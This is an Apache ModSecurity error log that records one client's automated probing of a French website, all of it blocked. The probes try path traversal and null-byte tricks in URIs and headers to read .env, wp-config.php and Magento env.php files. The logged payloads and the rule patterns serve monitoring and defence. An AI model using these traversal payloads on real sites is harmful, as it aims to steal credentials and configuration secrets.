[Tue May 12 05:10:32.025884 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.246:21454] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /static../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaKDue9Sp-pIv_Bb69KgAAAUk"]
[Tue May 12 05:10:32.025966 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.246:21454] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaKDue9Sp-pIv_Bb69KgAAAUk"]
[Tue May 12 05:10:32.026076 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.246:21454] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaKDue9Sp-pIv_Bb69KgAAAUk"]
[Tue May 12 05:10:32.026279 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.246:21454] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaKDue9Sp-pIv_Bb69KgAAAUk"]
[Tue May 12 05:10:32.035667 2026] [security2:error] [pid 1808852:tid 1808878] [client 45.148.10.246:21630] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env.dev"] [unique_id "agKaKBfeipD4uoG21FoqJgAAABc"]
[Tue May 12 05:10:32.035690 2026] [:error] [pid 1825287:tid 1825326] [client 45.148.10.246:21580] File does not exist: /home/ixinabou/public_html/php.php
[Tue May 12 05:10:32.035787 2026] [security2:error] [pid 1808852:tid 1808878] [client 45.148.10.246:21630] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env.dev"] [unique_id "agKaKBfeipD4uoG21FoqJgAAABc"]
[Tue May 12 05:10:32.035984 2026] [security2:error] [pid 1808852:tid 1808878] [client 45.148.10.246:21630] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env.dev"] [unique_id "agKaKBfeipD4uoG21FoqJgAAABc"]
[Tue May 12 05:10:32.043437 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.246:21604] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/health"] [unique_id "agKaKAgpmE1yW0glLdgnnQAAANg"]
[Tue May 12 05:10:32.043475 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.246:21604] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/health"] [unique_id "agKaKAgpmE1yW0glLdgnnQAAANg"]
[Tue May 12 05:10:32.043513 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.246:21604] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/health"] [unique_id "agKaKAgpmE1yW0glLdgnnQAAANg"]
[Tue May 12 05:10:32.043672 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.246:21604] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/api/health"] [unique_id "agKaKAgpmE1yW0glLdgnnQAAANg"]
[Tue May 12 05:10:32.043713 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.246:21604] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/api/health"] [unique_id "agKaKAgpmE1yW0glLdgnnQAAANg"]
[Tue May 12 05:10:32.043737 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.246:21604] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/api/health"] [unique_id "agKaKAgpmE1yW0glLdgnnQAAANg"]
[Tue May 12 05:10:32.044036 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.246:21604] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/api/health"] [unique_id "agKaKAgpmE1yW0glLdgnnQAAANg"]
[Tue May 12 05:10:32.044097 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.246:21454] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /static../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php"] [unique_id "agKaKDue9Sp-pIv_Bb69LAAAAUk"]
[Tue May 12 05:10:32.044164 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.246:21454] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php"] [unique_id "agKaKDue9Sp-pIv_Bb69LAAAAUk"]
[Tue May 12 05:10:32.044227 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.246:21604] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/api/health"] [unique_id "agKaKAgpmE1yW0glLdgnnQAAANg"]
[Tue May 12 05:10:32.044273 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.246:21454] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php"] [unique_id "agKaKDue9Sp-pIv_Bb69LAAAAUk"]
[Tue May 12 05:10:32.044487 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.246:21454] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php"] [unique_id "agKaKDue9Sp-pIv_Bb69LAAAAUk"]
[Tue May 12 05:10:32.053360 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.246:21614] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaKM1tk6y7yBJLpJozMQAAAIU"]
[Tue May 12 05:10:32.053476 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.246:21614] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaKM1tk6y7yBJLpJozMQAAAIU"]
[Tue May 12 05:10:32.053654 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.246:21614] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaKM1tk6y7yBJLpJozMQAAAIU"]
[Tue May 12 05:10:32.053719 2026] [security2:error] [pid 1808852:tid 1808878] [client 45.148.10.246:21630] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env.example"] [unique_id "agKaKBfeipD4uoG21FoqJwAAABc"]
[Tue May 12 05:10:32.053789 2026] [:error] [pid 1825287:tid 1825326] [client 45.148.10.246:21580] File does not exist: /home/ixinabou/public_html/i.php
[Tue May 12 05:10:32.053827 2026] [security2:error] [pid 1808852:tid 1808878] [client 45.148.10.246:21630] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env.example"] [unique_id "agKaKBfeipD4uoG21FoqJwAAABc"]
[Tue May 12 05:10:32.054018 2026] [security2:error] [pid 1808852:tid 1808878] [client 45.148.10.246:21630] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env.example"] [unique_id "agKaKBfeipD4uoG21FoqJwAAABc"]
[Tue May 12 05:10:32.064354 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.246:21632] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/health"] [unique_id "agKaKNr1yOh9TvizeziYxwAAAEY"]
[Tue May 12 05:10:32.064412 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.246:21632] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/health"] [unique_id "agKaKNr1yOh9TvizeziYxwAAAEY"]
[Tue May 12 05:10:32.064449 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.246:21632] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/health"] [unique_id "agKaKNr1yOh9TvizeziYxwAAAEY"]
[Tue May 12 05:10:32.064624 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.246:21454] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /static../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/app/etc/env.php"] [unique_id "agKaKDue9Sp-pIv_Bb69LQAAAUk"]
[Tue May 12 05:10:32.064630 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.246:21632] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/api/health"] [unique_id "agKaKNr1yOh9TvizeziYxwAAAEY"]
[Tue May 12 05:10:32.064688 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.246:21632] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/api/health"] [unique_id "agKaKNr1yOh9TvizeziYxwAAAEY"]
[Tue May 12 05:10:32.064726 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.246:21632] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/api/health"] [unique_id "agKaKNr1yOh9TvizeziYxwAAAEY"]
[Tue May 12 05:10:32.064750 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.246:21454] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/app/etc/env.php"] [unique_id "agKaKDue9Sp-pIv_Bb69LQAAAUk"]
[Tue May 12 05:10:32.064967 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.246:21454] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/app/etc/env.php"] [unique_id "agKaKDue9Sp-pIv_Bb69LQAAAUk"]
[Tue May 12 05:10:32.065083 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.246:21632] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/api/health"] [unique_id "agKaKNr1yOh9TvizeziYxwAAAEY"]
